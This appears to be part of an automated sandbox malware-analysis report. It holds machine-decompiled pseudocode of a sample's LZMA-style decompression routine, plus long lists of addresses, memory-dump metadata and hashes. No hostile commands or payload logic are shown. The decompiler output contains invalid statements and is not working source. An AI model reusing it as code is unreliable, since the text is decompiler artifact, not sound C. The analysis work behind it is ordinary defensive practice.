                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  												goto L149;
                                                  											case 0x18:
                                                  												L146:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x18;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t484 = __ebp - 0x70;
                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t484;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L148:
                                                  												_t487 = __ebp - 0x48;
                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                  												__eflags =  *_t487;
                                                  												L149:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__ecx =  *(__ebp - 0x40);
                                                  													__ebx =  *(__ebp - 0x50);
                                                  													0 = 1;
                                                  													__eax = 1 << __cl;
                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  													__eax =  *(__ebp - 0x7c);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													while(1) {
                                                  														 *(_t613 - 0x88) = _t533;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x50);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__esi = __edx + __eax;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__ax =  *__esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													__cx = __ax >> 5;
                                                  													__eax = __eax - __ecx;
                                                  													__edx = __edx + 1;
                                                  													__eflags = __edx;
                                                  													 *__esi = __ax;
                                                  													 *(__ebp - 0x50) = __edx;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L148;
                                                  												} else {
                                                  													goto L146;
                                                  												}
                                                  											case 0x19:
                                                  												__eflags = __ebx - 4;
                                                  												if(__ebx < 4) {
                                                  													 *(__ebp - 0x2c) = __ebx;
                                                  													L119:
                                                  													_t393 = __ebp - 0x2c;
                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  													__eflags =  *_t393;
                                                  													L120:
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													__eflags = __eax;
                                                  													if(__eax == 0) {
                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  														goto L170;
                                                  													}
                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                  														goto L171;
                                                  													}
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  													__eax =  *(__ebp - 0x30);
                                                  													_t400 = __ebp - 0x60;
                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  													__eflags =  *_t400;
                                                  													goto L123;
                                                  												}
                                                  												__ecx = __ebx;
                                                  												__eax = __ebx;
                                                  												__ecx = __ebx >> 1;
                                                  												__eax = __ebx & 0x00000001;
                                                  												__ecx = (__ebx >> 1) - 1;
                                                  												__al = __al | 0x00000002;
                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                  												__eflags = __ebx - 0xe;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												if(__ebx >= 0xe) {
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x48) = __ecx;
                                                  													L102:
                                                  													__eflags =  *(__ebp - 0x48);
                                                  													if( *(__ebp - 0x48) <= 0) {
                                                  														__eax = __eax + __ebx;
                                                  														 *(__ebp - 0x40) = 4;
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  														__eax =  *(__ebp - 4);
                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                  														__eflags = __eax;
                                                  														L108:
                                                  														__ebx = 0;
                                                  														 *(__ebp - 0x58) = __eax;
                                                  														 *(__ebp - 0x50) = 1;
                                                  														 *(__ebp - 0x44) = 0;
                                                  														 *(__ebp - 0x48) = 0;
                                                  														L112:
                                                  														__eax =  *(__ebp - 0x40);
                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  															_t391 = __ebp - 0x2c;
                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  															__eflags =  *_t391;
                                                  															goto L119;
                                                  														}
                                                  														__eax =  *(__ebp - 0x50);
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  														__eax =  *(__ebp - 0x58);
                                                  														__esi = __edi + __eax;
                                                  														 *(__ebp - 0x54) = __esi;
                                                  														__ax =  *__esi;
                                                  														__ecx = __ax & 0x0000ffff;
                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                  															__ecx = 0;
                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  															__ecx = 1;
                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  															__ebx = 1;
                                                  															__ecx =  *(__ebp - 0x48);
                                                  															__ebx = 1 << __cl;
                                                  															__ecx = 1 << __cl;
                                                  															__ebx =  *(__ebp - 0x44);
                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                  															__cx = __ax;
                                                  															__cx = __ax >> 5;
                                                  															__eax = __eax - __ecx;
                                                  															__edi = __edi + 1;
                                                  															__eflags = __edi;
                                                  															 *(__ebp - 0x44) = __ebx;
                                                  															 *__esi = __ax;
                                                  															 *(__ebp - 0x50) = __edi;
                                                  														} else {
                                                  															 *(__ebp - 0x10) = __edx;
                                                  															0x800 = 0x800 - __ecx;
                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  															 *__esi = __dx;
                                                  														}
                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                  															L111:
                                                  															_t368 = __ebp - 0x48;
                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                  															__eflags =  *_t368;
                                                  															goto L112;
                                                  														} else {
                                                  															goto L109;
                                                  														}
                                                  													}
                                                  													__ecx =  *(__ebp - 0xc);
                                                  													__ebx = __ebx + __ebx;
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  														__ecx =  *(__ebp - 0x10);
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  														__ebx = __ebx | 0x00000001;
                                                  														__eflags = __ebx;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L101:
                                                  														_t338 = __ebp - 0x48;
                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                  														__eflags =  *_t338;
                                                  														goto L102;
                                                  													} else {
                                                  														goto L99;
                                                  													}
                                                  												}
                                                  												__edx =  *(__ebp - 4);
                                                  												__eax = __eax - __ebx;
                                                  												 *(__ebp - 0x40) = __ecx;
                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  												goto L108;
                                                  											case 0x1a:
                                                  												L56:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1a;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x68);
                                                  												__al =  *(__ebp - 0x5c);
                                                  												__edx =  *(__ebp - 8);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *( *(__ebp - 0x68)) = __al;
                                                  												__ecx =  *(__ebp - 0x14);
                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                  												__eax = __ecx + 1;
                                                  												__edx = 0;
                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t192;
                                                  												goto L80;
                                                  											case 0x1b:
                                                  												L76:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1b;
                                                  													goto L170;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t275 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t275;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												_t284 = __ebp - 0x64;
                                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                                  												__eflags =  *_t284;
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												L80:
                                                  												 *(__ebp - 0x14) = __edx;
                                                  												goto L81;
                                                  											case 0x1c:
                                                  												while(1) {
                                                  													L123:
                                                  													__eflags =  *(__ebp - 0x64);
                                                  													if( *(__ebp - 0x64) == 0) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__edx =  *(__ebp - 8);
                                                  													__cl =  *(__eax + __edx);
                                                  													__eax =  *(__ebp - 0x14);
                                                  													 *(__ebp - 0x5c) = __cl;
                                                  													 *(__eax + __edx) = __cl;
                                                  													__eax = __eax + 1;
                                                  													__edx = 0;
                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                  													__edx = _t414;
                                                  													__eax =  *(__ebp - 0x68);
                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  													__eflags =  *(__ebp - 0x30);
                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                  													 *(__ebp - 0x14) = _t414;
                                                  													if( *(__ebp - 0x30) > 0) {
                                                  														continue;
                                                  													} else {
                                                  														L81:
                                                  														 *(__ebp - 0x88) = 2;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												 *(__ebp - 0x88) = 0x1c;
                                                  												goto L170;
                                                  										}
                                                  									}
                                                  									L171:
                                                  									_t535 = _t534 | 0xffffffff;
                                                  									goto L172;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}













                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a9b
                                                  0x00406a9b
                                                  0x00406a9f
                                                  0x00406aff
                                                  0x00406b02
                                                  0x00406b07
                                                  0x00406b08
                                                  0x00406b0a
                                                  0x00406b0c
                                                  0x00406b0f
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a21
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406abf
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af1
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                  • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                                                  • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                  • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E0040663C() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						 *(_t613 - 0x84) = 0xa;
                                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                  					} else {
                                                  						 *(__ebp - 0x84) = 9;
                                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  					}
                                                  					while(1) {
                                                  						 *(_t613 - 0x54) = _t606;
                                                  						while(1) {
                                                  							L133:
                                                  							_t531 =  *_t606;
                                                  							_t589 = _t531 & 0x0000ffff;
                                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  							if( *(_t613 - 0xc) >= _t565) {
                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  								 *(_t613 - 0x40) = 1;
                                                  								_t532 = _t531 - (_t531 >> 5);
                                                  								 *_t606 = _t532;
                                                  							} else {
                                                  								 *(_t613 - 0x10) = _t565;
                                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  							}
                                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                                  								goto L139;
                                                  							}
                                                  							L137:
                                                  							if( *(_t613 - 0x6c) == 0) {
                                                  								 *(_t613 - 0x88) = 5;
                                                  								L170:
                                                  								_t568 = 0x22;
                                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  								_t535 = 0;
                                                  								L172:
                                                  								return _t535;
                                                  							}
                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  							L139:
                                                  							_t533 =  *(_t613 - 0x84);
                                                  							while(1) {
                                                  								 *(_t613 - 0x88) = _t533;
                                                  								while(1) {
                                                  									L1:
                                                  									_t534 =  *(_t613 - 0x88);
                                                  									if(_t534 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                  										case 0:
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  											_t534 =  *( *(_t613 - 0x70));
                                                  											if(_t534 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											_t538 = _t534 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t570);
                                                  											_push(9);
                                                  											_pop(_t571);
                                                  											_t609 = _t538 / _t570;
                                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                                  											 *(_t613 - 0x3c) = _t604;
                                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  												L10:
                                                  												if(_t612 == 0) {
                                                  													L12:
                                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t612 = _t612 - 1;
                                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  												} while (_t612 != 0);
                                                  												goto L12;
                                                  											}
                                                  											if( *(_t613 - 4) != 0) {
                                                  												GlobalFree( *(_t613 - 4));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t613 - 4) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t613 - 0x6c);
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												 *(_t613 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
